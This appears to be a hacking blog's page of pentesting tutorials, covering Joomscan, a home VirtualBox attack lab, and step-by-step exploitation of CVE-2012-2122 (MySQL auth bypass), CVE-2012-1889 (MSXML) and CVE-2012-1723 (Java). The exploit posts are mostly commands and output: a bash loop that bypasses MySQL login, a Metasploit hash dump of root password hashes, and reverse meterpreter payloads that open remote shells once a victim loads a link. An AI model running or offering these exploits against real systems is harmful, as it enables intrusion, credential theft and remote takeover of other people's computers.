Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label Pentesting Tutorials. Show all posts
Showing posts with label Pentesting Tutorials. Show all posts

Sunday, 1 September 2013

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux

Joomscan is one of penetratoion testing  tool that help to find the vulnerability in joomla CMS.   The updated
version can detects 550 Vulnerabilities. Let me show how to use this joomscan in Backtrack5.

Download the Joomscan from here

Step 1: Moving to PenTest folder
Copy/Move the downloaded files  in directory
 /pentest/web/scanners/joomscan/


Step2: Set Permission
Now you have to set permission for the Joomscan file. In order to this, Type the following command in Terminal(if you don't know how to open terminal at all, please stop reading this and start it from basics of Linux).
CHMOD 0777 joomscan.pl 


Step 3: Update
Update the scanner to latest version. To do this, enter the following command in Terminal:
./joomscan.pl update


Step 4: Scanning for Vulnerability
Now everything ok, we have to scan our joomla site for vulnerability. To do this, enter the following command in Terminal: 
./joomscan.pl -u www.YourJoomlasite.com




Wait for a while, and it will list of the vulnerability found.

This tutorial is completely for Educational purpose only. This tutorial is for PenTester and Ethical Hackers .

LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES

How to Set up your Pen Testing / Ethical Hacking Lab with a single Computer ?

Hi BTS readers,  We have provide you plenty of Ethical hacking and Pentesting tutorial, still more article is going to come.  Meanwhile, i like to teach you how to  set up your own pen testing hacking network Lab.

Use of your own Pen Testing Lab:
  • Free, free ,free..! It's free lab, because it is yours..
  • Only one system is enough
  • can Practice your pentesting/hacking skills 
  • can install any kind of malwares(spyware,trojan) or RATs and test how it works
  • and more ...
is it possible to create a lab with single system?
Yes, you can. we are going to set up lot of vulnerable system virtually .  Confused? VirtualBox is open source software provided by Oracle corp that allows to run multiple guest OS(virtual system) in a single system . 

Requirements:
  • Virtual box latest version and its extension (get it from here: www.virtualbox.org/) 
  • Windows XP image file(xp.iso) ; it is going to be our target system
  • Backtrack Linux image file(backtrack5.iso); we are going to launch the attack from this OS.
First of all, Learn how to configure the Guest OS in VirtualBox from here:
https://www.virtualbox.org/manual/UserManual.html
This page will you explain everything about Virtualbox and how to setup Guest OS. 

I hope you now familiar with installing Guest OS. 

Set Up your Target system:Now we have to set up the target system.  Install the Windows XP in VirtualBox using the xp.iso file.  After installation completed, disable the Firewall in xp so that it can become more vulnerable system.

Set up your PenTesting System:Install the Backtrack5 in Virtualbox. Backtrack is penetration testing Linux that has lot of hacking tools .  We will hack the target system using this backtrack.

Network Settings for Guest Os:Step 1:
click the File  menu in Virtualbox and select Preference
Now select the Network Tab
Click the + symbol in the side that will add a new Host only network

Step2:

Right click on the Guest OX(eg:xp,backtrack) and select the Settings.
Select Network tab.
Now you can see the "Attached to" option menu.
change it from NAT to "Host only Adapter"
Do the same thing for both Guest OS.

Step 3:


Now run the both guest os .
Finding the IP address of Target System:open the Windows XP Guest OS window. 
open the cmd in Windows XP and type ipconfig
This will show the ip address of XP. It will be 192.168.56.101

Hacking with Pen Testing System:
open the Terminal  and type "nmap 192.168.56.101". 
Now it will show the list of open port.

You can hack the target system with open ports.
Let me explain more details in my next article.

If you have trouble in installing or confused, comment here.  

LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES

CVE-2012-2122: Exploiting authentication bypass vulnerability in MySQL and MariaDB

The news about the vulnerability in MySQL and MariaDB spreads like a wildfire I have covered about this vulnerability in E Hacking news as news article. Here, i am going to share the same thing from the perspective of a penetration tester.

The MySQL and MariaDB versions 5.161,5.2.11,5.3.5 and 5.5.c2 are affected version.

The vulnerability allows an attacker to access MySQL database without inputing proper authentication credentials. The vulnerability can only exploited if MySQL was built on a system where the memcmp() function can return values outside the -128 to 127 range. 

According to Gokubchik the gcc build in memcmp and BSD libc are safe bu the linux glibc sse-optimised memcmp is not safe.

Not all linux distro  are affected, only the following systems are vulnerable:
*ubuntu linux 64 bit(10.04,11.10,11.04,12.04)
*openSUSE 12.1 64 bit MySQL 5.5.23-log
*Debin Unstable 64 bit 5.5.23.2
*Fedora
*Arch Linux

In order to test the vulnerability, run the followoing bash script:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.12>/dev/null; done

The above code will provide access to an affectte MySQL Server as the root user account.

The following video is provided by one of EHN reader:


Exploiting using Metasploit :
one of metasploit contributor committee a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.:

$ msfconsolemsf > use auxiliary/scanner/mysql/mysql_authbypass_hashdumpmsf auxiliary(mysql_authbypass_hashdump) > set USERNAME rootmsf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1msf auxiliary(mysql_authbypass_hashdump) > run[+] 127.0.0.1:3306The server allows logins, proceeding with bypass test[*] 127.0.0.1:3306Authentication bypass is 10% complete[*] 127.0.0.1:3306Authentication bypass is 20% complete[*] 127.0.0.1:3306Successfully bypassed authentication after 205 attempts[+] 127.0.0.1:3306Successful exploited the authentication bypass flaw, dumping hashes...[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D[+] 127.0.0.1:3306Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89[*] 127.0.0.1:3306Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed


LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES
Credit Zoombie Hacker

CVE-2012-1889: Microsoft XML Core Services Vulnerability Metasploit Demo

CVE-2012-1889: Microsoft XML Core Services Vulnerability 


A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.

An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.

The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can get the full list. 
-----------------------------------------------------------------------------------------------------------------------------------------------------------
The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user.
-----------------------------------------------------------------------------------------------------------------------------------------------------------
I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. 

Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole".

Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".

Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.

Command: set SRVHOST 192.168.56.10
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set lhost 192.168.56.10

Command: set URIPATH /
Details: The path in which our exploit will run.

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp

Type "exploit" in the console.


Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:

[*] msxml_get_definition_code_exec - Using msvcrt ROP

[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html

[*] Sending stage (752128 bytes) to 192.168.56.12

[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) 

Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. 

Type "sysinfo" in the meterpreter to get the system information.

LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution


CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit Framework

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit



Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list  of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:


LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES